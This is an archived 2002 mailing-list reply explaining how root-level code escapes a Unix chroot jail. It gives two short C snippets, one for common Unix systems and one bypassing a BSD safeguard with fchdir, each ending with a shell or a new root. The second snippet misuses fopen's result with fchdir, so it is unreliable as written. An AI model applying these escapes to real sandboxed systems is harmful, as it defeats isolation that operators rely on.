Vulnerability Development mailing list archives
Re: OT? Are chroots immune to buffer overflows?
From: "Nelson Sampaio Araujo Junior" <nelson () lunenetworks com br>
Date: Fri, 24 May 2002 10:04:15 -0300
Hi,
But if you are able to run code as root, a few syscalls are still available to you: inserting modules and ptrace().
If you're able to run code as root, all you need, in most Un*x systems, is:

    mkdir("blah");
    chroot("blah");
    chdir("../../../../../../");
    chroot(".");
    execl("/bin/bash", "bash", NULL);

On other Un*x systems, like some BSDs, an implicit chdir(".") is always made after a chroot, so this doesn't work, but you can still do mknod(2), mount(2), etc.
To start working and prevent this "bug" :) in FreeBSD you can do the following:

    mkdir("blah");
    f = fopen("./afile", "w+");
    chroot("blah");
    fchdir(f);    <== this will prevent the "bug"
    for(int i=0; i<10000; i++)
        chdir("..");
    chroot(".");

Of course, you can enhance the above code to be more efficient just by checking the chdir result.

Regards,
Nelson Junior
nelson () lunenetworks com br
nelson () LUNE com br